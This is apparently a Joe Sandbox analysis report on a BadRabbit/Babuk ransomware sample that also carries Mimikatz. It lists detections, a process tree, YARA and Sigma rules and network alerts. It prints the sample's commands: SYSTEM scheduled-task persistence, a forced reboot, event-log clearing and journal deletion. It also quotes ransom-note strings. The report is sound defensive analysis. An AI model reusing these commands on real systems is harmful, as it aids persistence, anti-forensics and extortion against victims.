Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002C_35.exe

Overview

General Information

Sample name:LisectAVT_2403002C_35.exe
Analysis ID:1481356
MD5:d7ad0cdda235608cb4afb702562fdcfd
SHA1:358699a2bc63d26030f88b6287b07aaeb69680c5
SHA256:06d269411d74cbc6026eab2776a7cded68dd3380b7e1b890f15d2210d2ff376f
Tags:exe
Infos:

Detection

Babuk, Mimikatz, TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
System process connects to network (likely due to code injection or exploit)
Yara detected Babuk Ransomware
Yara detected Mimikatz
Yara detected TrojanRansom
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Clears the journal log
Clears the windows event log
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Contains functionality to infect the boot sector
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking mutex)
Query firmware table information (likely to detect VMs)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Eventlog Clear or Configuration Change
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • LisectAVT_2403002C_35.exe (PID: 6328 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe" MD5: D7AD0CDDA235608CB4AFB702562FDCFD)
    • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 4828 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 3216 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 3712 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7352 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7480 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit" MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7388 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7496 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00 MD5: 48C2FE20575769DE916F48EF0676A965)
      • D99F.tmp (PID: 7440 cmdline: "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9} MD5: 347AC3B6B791054DE3E5720A7144A977)
        • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7604 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wevtutil.exe (PID: 7644 cmdline: wevtutil cl Setup MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7660 cmdline: wevtutil cl System MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7680 cmdline: wevtutil cl Security MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7716 cmdline: wevtutil cl Application MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • fsutil.exe (PID: 7732 cmdline: fsutil usn deletejournal /D C: MD5: 452CA7574A1B2550CD9FF83DDBE87463)
      • cmd.exe (PID: 8032 cmdline: /c schtasks /Delete /F /TN drogon MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8128 cmdline: schtasks /Delete /F /TN drogon MD5: 48C2FE20575769DE916F48EF0676A965)
  • svchost.exe (PID: 5640 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 5768 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5816 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7144 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7096 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7292 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 7804 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dispci.exe (PID: 7868 cmdline: "C:\Windows\dispci.exe" -id 1283680486 MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7924 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8008 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
  • svchost.exe (PID: 7948 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • LogonUI.exe (PID: 8052 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3f80855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • svchost.exe (PID: 8188 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5504 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 5140 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • LogonUI.exe (PID: 7756 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f8d855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 760 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
MimiKatzVaronis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
  • APT32
  • Anunak
  • GALLIUM
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
LisectAVT_2403002C_35.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\cscc.datINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
  • 0x2b3d8:$d1: \DosDevices\dcrypt
  • 0x2b488:$d2: $dcsys$_fail_%x
  • 0x2b468:$d3: %s\$DC_TRIM_%x$
  • 0x2b3b8:$d4: \Device\dcrypt
  • 0x2b420:$d5: %s\$dcsys$
C:\Windows\dispci.exesig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
  • 0x1b40a:$s3: If you have already got the password, please enter it below.
  • 0x1f55a:$s3: If you have already got the password, please enter it below.
  • 0x2130c:$s4: dispci.exe
  • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x147b8:$s7: Enter password#1:
  • 0x14676:$s8: Enter password#2:
  • 0x14430:$s9: C:\Windows\cscc.dat
  • 0x14940:$s10: schtasks /Delete /F /TN %ws
  • 0x1b448:$s11: Password#1:
  • 0x1f598:$s11: Password#1:
  • 0x14398:$s12: \AppData
  • 0x14650:$s13: Readme.txt
  • 0x14752:$s14: Disk decryption completed
  • 0x146ca:$s15: Files decryption completed
  • 0x212b4:$s16: http://diskcryptor.net/
  • 0x1b235:$s17: Your personal installation key#1:
C:\Windows\dispci.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
  • 0x14430:$x4: C:\Windows\cscc.dat
  • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
  • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x146ca:$s6: Files decryption completed
  • 0x145ea:$s7: Disable your anti-virus and anti-malware programs

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmpsig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
  • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
  • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
  • 0x1a452:$s3: If you have already got the password, please enter it below.
  • 0x1e5a2:$s3: If you have already got the password, please enter it below.
  • 0x20354:$s4: dispci.exe
  • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
  • 0x13800:$s7: Enter password#1:
  • 0x136be:$s8: Enter password#2:
  • 0x13478:$s9: C:\Windows\cscc.dat
  • 0x13988:$s10: schtasks /Delete /F /TN %ws
  • 0x1a490:$s11: Password#1:
  • 0x1e5e0:$s11: Password#1:
  • 0x133e0:$s12: \AppData
  • 0x13698:$s13: Readme.txt
  • 0x1379a:$s14: Disk decryption completed
  • 0x13712:$s15: Files decryption completed
  • 0x202fc:$s16: http://diskcryptor.net/
  • 0x1a27d:$s17: Your personal installation key#1:
Process Memory Space: rundll32.exe PID: 4828JoeSecurity_babukYara detected Babuk RansomwareJoe Security
    Process Memory Space: rundll32.exe PID: 4828JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security
      Process Memory Space: dispci.exe PID: 7868JoeSecurity_babukYara detected Babuk RansomwareJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.LisectAVT_2403002C_35.exe.510000.0.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
        • 0x6114:$x3: C:\Windows\infpub.dat
        • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
        3.3.rundll32.exe.32943b8.2.unpackINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
        • 0x2a1d8:$d1: \DosDevices\dcrypt
        • 0x2a288:$d2: $dcsys$_fail_%x
        • 0x2a268:$d3: %s\$DC_TRIM_%x$
        • 0x2a1b8:$d4: \Device\dcrypt
        • 0x2a220:$d5: %s\$dcsys$
        3.3.rundll32.exe.32943b8.1.unpackINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
        • 0x2a1d8:$d1: \DosDevices\dcrypt
        • 0x2a288:$d2: $dcsys$_fail_%x
        • 0x2a268:$d3: %s\$DC_TRIM_%x$
        • 0x2a1b8:$d4: \Device\dcrypt
        • 0x2a220:$d5: %s\$dcsys$
        0.2.LisectAVT_2403002C_35.exe.ede2e0.1.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
        • 0x5514:$x3: C:\Windows\infpub.dat
        • 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
        19.0.D99F.tmp.7ff609750000.0.unpackJoeSecurity_Mimikatz_2Yara detected MimikatzJoe Security
          Click to see the 23 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Invoke-Obfuscation CLIP+ Launcher
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4828, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7352, ProcessName: cmd.exe
          Sigma detected: Invoke-Obfuscation VAR+ Launcher
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4828, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7352, ProcessName: cmd.exe
          Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7480, ProcessName: schtasks.exe
          Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7480, ProcessName: schtasks.exe
          Sigma detected: Suspicious Eventlog Clear or Configuration Change
          Source: Process startedAuthor: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105: Data: Command: wevtutil cl Setup, CommandLine: wevtutil cl Setup, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wevtutil.exe, NewProcessName: C:\Windows\SysWOW64\wevtutil.exe, OriginalFileName: C:\Windows\SysWOW64\wevtutil.exe, ParentCommandLine: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7604, ParentProcessName: cmd.exe, ProcessCommandLine: wevtutil cl Setup, ProcessId: 7644, ProcessName: wevtutil.exe
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cdd.dll, NewProcessName: C:\Windows\System32\cdd.dll, OriginalFileName: C:\Windows\System32\cdd.dll, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: cdd.dll
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5640, ProcessName: svchost.exe

          Data Obfuscation

          barindex
          Sigma detected: Execute DLL with spoofed extension
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe, ParentProcessId: 6328, ParentProcessName: LisectAVT_2403002C_35.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 4828, ProcessName: rundll32.exe

          Snort Signatures

          No Snort rule has matched

          Suricata Signatures

          Timestamp:2024-07-25T08:19:02.999617+0200
          SID:2840787
          Source Port:49710
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T08:19:07.858858+0200
          SID:2022930
          Source Port:443
          Destination Port:49722
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-25T08:19:03.471374+0200
          SID:2028371
          Source Port:49713
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-07-25T08:19:44.974242+0200
          SID:2022930
          Source Port:443
          Destination Port:49747
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: LisectAVT_2403002C_35.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Windows\dispci.exeAvira: detection malicious, Label: TR/Diskcoder.12354
          Multi AV Scanner detection for dropped file
          Source: C:\Windows\dispci.exeReversingLabs: Detection: 95%
          Multi AV Scanner detection for submitted file
          Source: LisectAVT_2403002C_35.exeReversingLabs: Detection: 86%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.6% probability
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF6299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,3_2_04BF6299
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF6085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,3_2_04BF6085
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,3_2_04BF5613
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_04BF5A73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_04BF15A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_04BF5BC4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,FindCloseChangeNotification,CryptDestroyKey,SetEvent,3_2_04BF5D0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,3_2_04BF5507
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,3_2_04BF554A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF56D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,3_2_04BF56D8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF6246 CryptCreateHash,CryptHashData,CryptGetHashParam,3_2_04BF6246
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,3_2_04BF559B
